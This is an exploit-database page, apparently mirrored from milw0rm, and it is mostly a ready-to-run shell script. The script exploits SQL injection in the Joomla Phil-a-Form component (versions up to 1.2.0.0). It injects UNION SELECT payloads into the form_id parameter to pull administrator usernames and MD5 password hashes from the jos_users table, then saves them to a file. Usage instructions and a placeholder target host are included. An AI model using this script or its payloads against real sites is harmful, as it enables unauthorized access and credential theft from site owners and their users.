Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Joomla Component Phil-a-Form SQL Injection Exploi


                                                #!/bin/sh

#################################################################################
#										#
#    Joomla Component Phil-a-Form &#60;= 1.2.0.0 SQL Injection Exploit		#
#										#
# Discovered by: Cody &#34;CypherXero&#34; Rester					#
# Payload: Admin Username and MD5 Hash Retrieval				#
# Website: http://www.cypherxero.net						#
# Shoutouts to the milw0rm community, the PIMP forums				#
# and my blog, of course  	 						#
#										#
#################################################################################

echo &#34;-------------------------------------------------------------------------&#34;
echo &#34;      Joomla Component Phil-a-Form &#60;= 1.2.0.0 SQL Injection Exploit&#34;
echo &#34;-------------------------------------------------------------------------&#34;
echo &#34;Usage: sql_philaform_jos.sh [HOST] [FORM_ID]&#34;
echo &#34;[HOST] = Hostname of targetwebsite&#34;
echo &#34;[FORM_ID] = Form ID of Phil-a-Form post&#34;
echo &#34;e.g. sql_philaform_jos.sh http://www.targethost.com 2&#34;
echo &#34;-------------------------------------------------------------------------&#34;
echo &#34;                           Cody CypherXero Rester&#34;
echo &#34;            		 http://www.cypherxero.net&#34;
echo &#34;-------------------------------------------------------------------------&#34;

jos_username=&#34;%20UNION%20SELECT%20null,null,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--&#34;
jos_password=&#34;%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20jos_users%20--&#34;
host=&#34;$1&#34;
form_id=&#34;$2&#34;

if [ &#34;$form_id&#34; == &#34;&#34; ]
then
echo &#34;Syntax not correct! See usage example!&#34;
exit 1
else
echo &#34;&#34;
fi

echo &#34;Username&#34; &#62; $host.txt
echo &#34;--------&#34; &#62;&#62; $host.txt
links -dump &#34;http://$host/index.php?option=com_philaform&form_id=$form_id$jos_username&#34; | grep -i &#34;philaform_&#34; | awk -F\_ &#39;{ print $2 }&#39; | awk &#39;{ print $1 }&#39; &#62;&#62; $host.txt
echo &#34; &#34; &#62;&#62; $host.txt
echo &#34;MD5 Password Hash&#34; &#62;&#62; $host.txt
echo &#34;-----------------&#34; &#62;&#62; $host.txt
links -dump &#34;http://$host/index.php?option=com_philaform&form_id=$form_id$jos_password&#34; | grep -i &#34;philaform_&#34; | awk -F\_ &#39;{ print $2 }&#39; | awk &#39;{ print $1 }&#39; &#62;&#62; $host.txt

echo &#34;&#34;
cat $host.txt

exit 0

# milw0rm.com [2007-05-28]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1